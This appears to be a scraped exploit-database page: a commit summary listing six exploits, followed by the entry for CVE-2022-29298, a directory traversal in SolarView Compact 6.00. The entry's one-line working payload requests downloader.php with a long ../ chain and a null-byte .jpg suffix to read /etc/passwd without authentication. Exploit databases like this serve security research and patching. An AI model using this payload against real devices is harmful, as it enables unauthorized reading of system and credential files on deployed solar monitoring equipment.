
7 changes to exploits/shellcodes Zyxel USG FLEX 5.21 - OS Command Injection Telesquare SDT-CW3B1 1.1.0 - OS Command Injection Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE) SolarView Compact 6.00 - Directory Traversal Contao 4.13.2 - Cross-Site Scripting (XSS) Microweber CMS 1.2.15 - Account Takeover
13 lines
No EOL
455 B
Text
13 lines
No EOL
455 B
Text
# Exploit Title: SolarView Compact 6.00 - Directory Traversal
|
|
# Date: 2022-05-15
|
|
# Exploit Author: Ahmed Alroky
|
|
# Author Company : Aiactive
|
|
# Author linkedin profile : https://www.linkedin.com/in/ahmedalroky/
|
|
# Version: ver.6.00
|
|
# Vendor home page : https://www.contec.com/
|
|
# Authentication Required: No
|
|
# CVE : CVE-2022-29298
|
|
|
|
# Tested on: Windows
|
|
|
|
# Exploit: http://IP_ADDRESS/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg |